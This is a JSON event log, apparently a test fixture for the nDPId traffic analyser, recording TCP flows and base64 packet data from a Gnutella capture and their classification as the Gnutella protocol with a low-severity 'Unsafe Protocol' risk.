+00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BGFAAIAGRVEKAAIPYEFEwsSJipmyoW1hAAAAAIAC+vBT5wAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw5AAIAGft8KAAIPUAf8wMSKGugAPu54AAAAAIAC+vBNHwAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0e4RAAIAGraEKAAIPLR+YcMSLaOPXzV5xAAAAAIAC+vA+0wAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xktAAIAG9NcKAAIPjoSlDcSMd2bhikpDAAAAAIAC+vDMvQAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xP1AAIAGoVMKAAIPvKXLvsSNVetyIY5LAAAAAIAC+vDExgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Yo9AAIAGTC8KAAIPwSB+1sSO6MzJTpedAAAAAIAC+vAZ0gAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0OINAAIAGsckKAAIPubtKrcSP0PGcxJ9SAAAAAIAC+vCSDwAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SsxAAIAGLMcKAAIPwqO0fsSQKkliYWFkAAAAAIAC+vA+TwAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Ar9AAIAGpjAKAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ptBAAIAGmUcKAAIPpIQKGcSS2AZOgZ\/9AAAAAIAC+vAuWwAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eN9AAIAGqLsKAAIPM0SZ1sSTZo3Cj79BAAAAAIAC+vDuAwAAAgQFtAEDAwgBAQQC"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":90760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90760,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0kAAEAGeoC8PTS3CgACDy5MxHwAp\/gBiFqWg2AS\/\/+QwwAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":90760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90760,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoc0ZAAIAGioYKAAIPvD00t8R8LkyIWpaDAKf4AlAQ+vCtjwAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0sAAEAGN+GOhKUNCgACD3dmxIwAqPIB4YpKRGAS\/\/\/+CQAAAgQFtA=="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0wAAEAGSwNNOtM0CgACDw7exHgAqewBNESdzWAS\/\/\/ZhQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":90767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90767,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxkxAAIAG9OIKAAIPjoSlDcSMd2bhikpEAKjyAlAQ+vAa1gAA"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":90768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90768,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoHOhAAIAGsWoKAAIPTTrTNMR4Dt40RJ3NAKnsAlAQ+vD2UQAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":90768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90768,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA04AAEAG9E3Co7R+CgACDypJxJAAquYBYmFhZWAS\/\/97mQAAAgQFtA=="} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSs1AAIAGLNIKAAIPwqO0fsSQKkliYWFlAKrmAlAQ+vCYZQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1AAAEAGZwW5u0qtCgACD9DxxI8Aq+ABnMSfU2AS\/\/\/VWAAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1EAAEAG4wi8pcu+CgACD1XrxI0ArNoBciGOTGAS\/\/8ODwAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoOIRAAIAGsdQKAAIPubtKrcSP0PGcxJ9TAKvgAlAQ+vDyJAAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxP5AAIAGoV4KAAIPvKXLvsSNVetyIY5MAKzaAlAQ+vAq2wAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1UAAEAGyRlYeEnXCgACD1\/yxH8ArdQBY7MtEWAS\/\/9f0wAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1YAAEAGK3HBIH7WCgACD+jMxI4Ars4ByU6XnmAS\/\/9vGAAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo+\/1AAIAGUHQKAAIPWHhJ18R\/X\/Jjsy0RAK3UAlAQ+vB8nwAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1cAAEAGVX5o7qz6CgACD1v8xIgAr8gBAIGaT2AS\/\/\/yGAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoYpBAAIAGTDoKAAIPwSB+1sSO6MzJTpeeAK7OAlAQ+vCL5AAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":90777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90777,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBk9AAIAG0okKAAIPaO6s+sSIW\/wAgZpPAK\/IAlAQ+vAO5QAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 